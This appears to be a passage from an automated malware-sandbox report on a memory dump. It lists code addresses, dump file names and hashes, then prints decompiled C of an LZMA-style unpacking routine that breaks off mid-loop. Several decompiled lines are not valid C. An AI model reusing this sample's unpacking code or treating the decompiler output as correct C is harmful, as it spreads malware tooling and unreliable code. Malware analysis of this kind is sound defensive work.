                                            0x00406756
                                            0x0040675b
                                            0x0040675d
                                            0x00406760
                                            0x00406760
                                            0x0040678f
                                            0x00406796
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00000000
                                            0x00406798
                                            0x00000000
                                            0x00406798
                                            0x00406796
                                            0x004066a9
                                            0x004066ac
                                            0x004066ae
                                            0x004066b1
                                            0x004066b4
                                            0x004066b7
                                            0x004066b9
                                            0x004066bc
                                            0x004066bf
                                            0x004066bf
                                            0x004066c2
                                            0x004066c2
                                            0x004066c5
                                            0x004066cc
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x00000000
                                            0x004066ce
                                            0x00000000
                                            0x004066ce
                                            0x004066cc
                                            0x00406652
                                            0x00406655
                                            0x00406657
                                            0x0040665a
                                            0x00000000
                                            0x00000000
                                            0x004063b9
                                            0x004063b9
                                            0x004063bd
                                            0x00406a02
                                            0x00000000
                                            0x00406a02
                                            0x004063c3
                                            0x004063c6
                                            0x004063c9
                                            0x004063cc
                                            0x004063cf
                                            0x004063d2
                                            0x004063d5
                                            0x004063d7
                                            0x004063da
                                            0x004063dd
                                            0x004063e0
                                            0x004063e2
                                            0x004063e2
                                            0x004063e2
                                            0x00000000
                                            0x00000000
                                            0x00406544
                                            0x00406544
                                            0x00406548
                                            0x00406a0e
                                            0x00000000
                                            0x00406a0e
                                            0x0040654e
                                            0x00406551
                                            0x00406554
                                            0x00406557
                                            0x00406559
                                            0x00406559
                                            0x00406559
                                            0x0040655c
                                            0x0040655f
                                            0x00406562
                                            0x00406565
                                            0x00406568
                                            0x0040656b
                                            0x0040656c
                                            0x0040656e
                                            0x0040656e
                                            0x0040656e
                                            0x00406571
                                            0x00406574
                                            0x00406577
                                            0x0040657a
                                            0x0040657a
                                            0x0040657a
                                            0x0040657d
                                            0x0040657f
                                            0x0040657f
                                            0x00000000
                                            0x00000000
                                            0x004067c1
                                            0x004067c1
                                            0x004067c1
                                            0x004067c5
                                            0x00000000
                                            0x00000000
                                            0x004067cb
                                            0x004067ce
                                            0x004067d1
                                            0x004067d4
                                            0x004067d6
                                            0x004067d6
                                            0x004067d6
                                            0x004067d9
                                            0x004067dc
                                            0x004067df
                                            0x004067e2
                                            0x004067e5
                                            0x004067e8
                                            0x004067e9
                                            0x004067eb
                                            0x004067eb
                                            0x004067eb
                                            0x004067ee
                                            0x004067f1
                                            0x004067f4
                                            0x004067f7
                                            0x004067fa
                                            0x004067fe
                                            0x00406800
                                            0x00406803
                                            0x00000000
                                            0x00406805
                                            0x00406582
                                            0x00406582
                                            0x00000000
                                            0x00406582
                                            0x00406803
                                            0x00406a38
                                            0x00406a5a
                                            0x00406a60
                                            0x00406a62
                                            0x00406a69
                                            0x00000000
                                            0x00000000
                                            0x00406067
                                            0x00406a6f
                                            0x00406a6f
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                            • Instruction ID: b8f14fa8ad5cea51b2b9a2e46606c418b7244df3771cf842608f3b99def8c173
                                            • Opcode Fuzzy Hash: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                            • Instruction Fuzzy Hash: A3818731E00228CFDF24DFA8C8447ADBBB1FB45305F21816AD956BB281C7785A96DF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00406473, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 98%
                                            			E00406473() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00406A77))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
